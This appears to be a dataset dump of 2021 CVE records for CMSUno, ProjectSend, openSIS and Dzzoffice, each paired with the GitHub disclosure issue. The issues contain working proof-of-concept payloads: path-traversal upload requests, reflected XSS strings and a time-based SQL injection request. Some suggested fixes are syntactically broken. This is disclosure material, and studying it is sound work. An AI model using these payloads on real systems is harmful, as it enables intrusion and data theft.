cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2021-40889 | 2021-10-11T10:15:07.697 | CMSUno version 1.7.2 is affected by a PHP code execution vulnerability. sauvePass action in {webroot}/uno/central.php file calls to file_put_contents() function to write username in password.php file when a user successfully changed their password. The attacker can inject malicious PHP code into password.php and then use the login function to execute code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/boiteasite/cmsuno/issues/19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/boiteasite/cmsuno/issues/19"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cmsuno_project:cmsuno:1.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "52C39F4E-947F-4A8D-950F-D5FFDD33D12C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/boiteasite/cmsuno/issues/19 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"boiteasite",
"cmsuno"
] | Dear @boiteasite,
I found a security problem can lead to remote code execution in CMSUno version 1.7.2
# Description:
`sauvePass` action in `{webroot}/uno/central.php` file call to `file_put_contents()` function to write username to `password.php` file when user successfully changed password, Becase of filter without ` ' , " , ; , (), ...` the attacker can inject malicious php code into password.php

# PoC:


When submit username and password, php code will be executed
 | PHP Code Execution via change password function | https://api.github.com/repos/boiteasite/cmsuno/issues/19/comments | 2 | 2021-09-09T04:11:04Z | 2021-09-10T13:33:35Z | https://github.com/boiteasite/cmsuno/issues/19 | 991,735,498 | 19 | 2,677 |
CVE-2021-40884 | 2021-10-11T11:15:09.547 | Projectsend version r1295 is affected by sensitive information disclosure. Because of not checking authorization in ids parameter in files-edit.php and id parameter in process.php function, a user with uploader role can download and edit all files of users in application. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/992"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/992"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"862"
] | 862 | https://github.com/projectsend/projectsend/issues/992 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson, @kwadrat ,
I have found an IDOR vulnerability in `Files` function.
# Description
Because of not checking authorization at `ids` parameter in `files-edit.php` and `id` parameter in `process.php`, The user with uploader role can `download`,`edit` all files of users in application
# To Reproduce
# Download file
1. Access url `/process.php?do=download&id=` url
2. Add value for `id` parameter from `1` -> `...` to download all files in application

# Edit File
1. Access url `/files-edit.php?ids=`
2. Add value for id parameter from `1` -> `...` to edit all files in application
Files of user `kietna` on application

User `kietna` edit private file of `admin` user



# Solution
You need to check authorization for `id` and `ids` parameters, make sure that a user on the system can only interact with that user's files | Insecure Direct Object Reference in Files function | https://api.github.com/repos/projectsend/projectsend/issues/992/comments | 0 | 2021-09-07T05:13:56Z | 2021-09-07T05:22:44Z | https://github.com/projectsend/projectsend/issues/992 | 989,600,409 | 992 | 2,678 |
CVE-2021-40886 | 2021-10-11T11:15:09.590 | Projectsend version r1295 is affected by a directory traversal vulnerability. A user with Uploader role can add value `2` for `chunks` parameter to bypass `fileName` sanitization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/993"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/993"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/projectsend/projectsend/issues/993 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson,
I found a Path traversal vulnerability on your application!
# Description
Because of not checking if clause for `chunks` parameter when `chunks` >= 2, the user with Uploader role can add value `2` for `chunks` param to bypass `fileName` sanitizer

- In Step 1: 3 parameter that I can control when using upload function `chunk`, `chunks`, `fileName`
- In Step 2: The if clause check if `chunks` parameter < `2`, the `fileName` parameter will be handled. So i add value `2` for `chunks` param then it will pass Step 2 and go to Step 3

if i don't add value for `chunk` then the `chunk` parameter goes to `0` and add value `2` for `chunks` parameter, i can pass this if
# Step To Reproduce
1. Use burpsuite to capture upload request
2. Change valuable of `chunks` parameter to `2` and add dot dot for `name` parameter to escape root directory
3. The file was uploaded in webroot directory with `index.html.part` name

# Request:
```
POST /includes/upload.process.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887
Content-Length: 2817
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/upload.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="name"
../../csrf.html
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="chunks"
2
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
<img src=x onerror=alert(1);>
-----------------------------4677942761162401681381669887--
```
# Solutions:
Add if clause to check when `chunks` parameter >= `2` | Path traversal in Upload file function | https://api.github.com/repos/projectsend/projectsend/issues/993/comments | 4 | 2021-09-07T07:07:48Z | 2023-01-19T20:50:48Z | https://github.com/projectsend/projectsend/issues/993 | 989,664,282 | 993 | 2,679 |
CVE-2021-40887 | 2021-10-11T11:15:09.633 | Projectsend version r1295 is affected by a directory traversal vulnerability. Because of lacking sanitization input for files[] parameter, an attacker can add ../ to move all PHP files or any file on the system that has permissions to /upload/files/ folder. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/994"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/994"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/projectsend/projectsend/issues/994 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson ,
I found a Path traversal vulnerability in import-orphans.php
# Description
Becase of lacking sanitization input for `files[]` parameter, The attacker can add `../` to move all of php files or any file on the system that has permissions to `/upload/files/` folder

# Step To Reproduce
1. Using burpsuite tool to capture request of import-orphans.php function
2. Adding `../../[file name want to move]` in `files[]` parameter, in this step the attacker can move php files with the aim of sabotaging the system or read sentitive file in system like `passwd, access log, ...`
3. Then access `webroot/import-orphans.php` to get a new name of file

4. Then access `webroot/upload/files/[new name of file]`
# Request move `index.php` file
```
POST /import-orphans.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------41162972056717011663508504951
Content-Length: 388
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/import-orphans.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;
Upgrade-Insecure-Requests: 1
-----------------------------41162972056717011663508504951
Content-Disposition: form-data; name="csrf_token"
ccc780a3231d3f7544fe9eaa9f3aea28756bdbfd1df824b726865ebaf1505fa1
-----------------------------41162972056717011663508504951
Content-Disposition: form-data; name="files[]"
../../index.php
-----------------------------41162972056717011663508504951--
```

Then `webroot` returned Directory Listing because of moving `index.php` file to `/upload/files` folder

# Solution:
```
if(preg_match('/.\.\/',$_POST['files'] === 1){
die();
}
``` | Path Traversal vulnerability in import-orphans.php | https://api.github.com/repos/projectsend/projectsend/issues/994/comments | 18 | 2021-09-07T09:04:17Z | 2024-05-10T10:25:40Z | https://github.com/projectsend/projectsend/issues/994 | 989,761,035 | 994 | 2,680 |
CVE-2021-40888 | 2021-10-11T11:15:09.673 | Projectsend version r1295 is affected by Cross Site Scripting (XSS) due to lack of sanitization when echo output data in returnFilesIds() function. A low privilege user can call this function through process.php file and execute scripting code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/995"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/releases/tag/r1295"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/995"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/releases/tag/r1295"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/projectsend/projectsend/issues/995 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson,
I found a vulnerability that execute malicious script of user,
# Description:
Because of lacking of sanitizer when echo output data in returnFilesIds() function in `{webroot}/includes/Classes/Download.php` , the low privilege user (Uploader role) can call this function through process.php file and execute scripting code


# PoC:
`{webroot}/process.php?do=return_files_ids&files[0][name]=x&files[0][value]=23"><img src=x onerror=alert(1);>`

# Solutions:
```
public function returnFilesIds($file_ids)
{
$this->check_level = array(9,8,7,0);
if (isset($file_ids)) {
// do a permissions check for logged in user
if (current_role_in($this->check_level)) {
$file_list = array();
foreach($file_ids as $key => $data) {
$file_list[] = $data['value'];
}
ob_clean();
flush();
$return = implode( ',', $file_list );
}
else {
return false;
}
}
else {
return false;
}
echo htmlentities($return) // fixed in here, html encoding prevent xss;
}
``` | Reflected Cross-site Scripting in returnFilesIds() function | https://api.github.com/repos/projectsend/projectsend/issues/995/comments | 1 | 2021-09-08T02:13:10Z | 2021-09-10T13:43:02Z | https://github.com/projectsend/projectsend/issues/995 | 990,591,132 | 995 | 2,681 |
CVE-2021-40542 | 2021-10-11T13:15:07.417 | Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/189"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/189"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/OS4ED/openSIS-Classic/issues/189 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | # Description:
Because of lacking of sanitizer of input data at `$_REQUEST['link_url']` in `Ajax_url_encode.php` file, The Unauthenticated user can inject and execute javascript code on `link_url` parameter

Testing on local site:

Testing on demo site:

# To Reproduce
## XSS 1
Steps to reproduce the behavior:
1. Acess `Ajax_url_encode.php` file
2. Add `?link_url=[malicious script in here]` behind `Ajax_url_encode.php` file
3. The backend will echo and execute malicious script
### Request
```
GET /Ajax_url_encode.php?link_url=%3Cimg%20src=x%20onerror=alert(1);%3E HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=mebdcag3g6jknfb8edrmee7ijp
Upgrade-Insecure-Requests: 1
```
### Response
```
HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 09:38:31 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21
X-Powered-By: PHP/7.4.21
Content-Length: 31
Connection: close
Content-Type: text/html; charset=UTF-8
<img src=x onerror=alert(1);>
```
# Solution:
use `htmlentities()` function when echo the output
```
echo htmlentities($encoded_url);
``` | Unauthenticated Reflect Cross-site Scripting in Ajax_url_encode.php file | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/189/comments | 2 | 2021-09-01T09:41:11Z | 2021-09-17T15:03:17Z | https://github.com/OS4ED/openSIS-Classic/issues/189 | 984,935,542 | 189 | 2,682 |
CVE-2021-40543 | 2021-10-11T13:15:07.457 | Opensis-Classic Version 8.0 is affected by a SQL injection vulnerability due to a lack of sanitization of input data at two parameters $_GET['usrid'] and $_GET['prof_id'] in the PasswordCheck.php file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/191"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/191"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/191 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | # Description:
Because of lacking of sanitizer of input data at two parameters `$_GET['usrid']` and `$_GET['prof_id']` in `PasswordCheck.php` file, The Unauthenticated user can inject sql code and get all informations in database

Use sqlmap tool dump users of database

# To Reproduce
## SQL INJECTION
Steps to reproduce the behavior:
1. Acess `PasswordCheck.php` file
2. Add `?password=P@a&usrid=[inject sql code in here]&prof_id=[inject sql code in here]` behind `PasswordCheck.php` file
### Request
```
GET /PasswordCheck.php?password=P@a&usrid=1&prof_id=1%27%20AND%20(SELECT%209714%20FROM%20(SELECT(SLEEP(5)))vGYX)--%20- HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=bcq1n5bpstl0b93h22v51uv2sc
Upgrade-Insecure-Requests: 1
```
### Response
```
HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 10:46:49 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21
X-Powered-By: PHP/7.4.21
Content-Length: 2
Connection: close
Content-Type: text/html; charset=UTF-8
0
```
# Solution:
use `sqlSecurityFilter()` function in `functions/SqlSecurityFnc.php`
```
include("functions/SqlSecurityFnc.php");
$usrid = sqlSecurityFilter($_GET['usrid']);
$res_pass_chk = DBGet(DBQuery("SELECT * FROM login_authentication WHERE PASSWORD = '".md5($_GET['password'])."' AND USERNAME!='".$usrid."' AND PROFILE_ID!='".intval($_GET['prof_id'])."'"));
``` | Unauthenticated SQL Injection in PasswordCheck.php file | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/191/comments | 3 | 2021-09-01T10:55:25Z | 2021-10-30T09:57:08Z | https://github.com/OS4ED/openSIS-Classic/issues/191 | 985,003,822 | 191 | 2,683 |
CVE-2021-40191 | 2021-10-11T14:15:07.600 | Dzzoffice Version 2.02.1 is affected by cross-site scripting (XSS) due to a lack of sanitization of input data at all upload functions in webroot/dzz/attach/Uploader.class.php and return a wrong response in content-type of output data in webroot/dzz/attach/controller.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/196"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D",
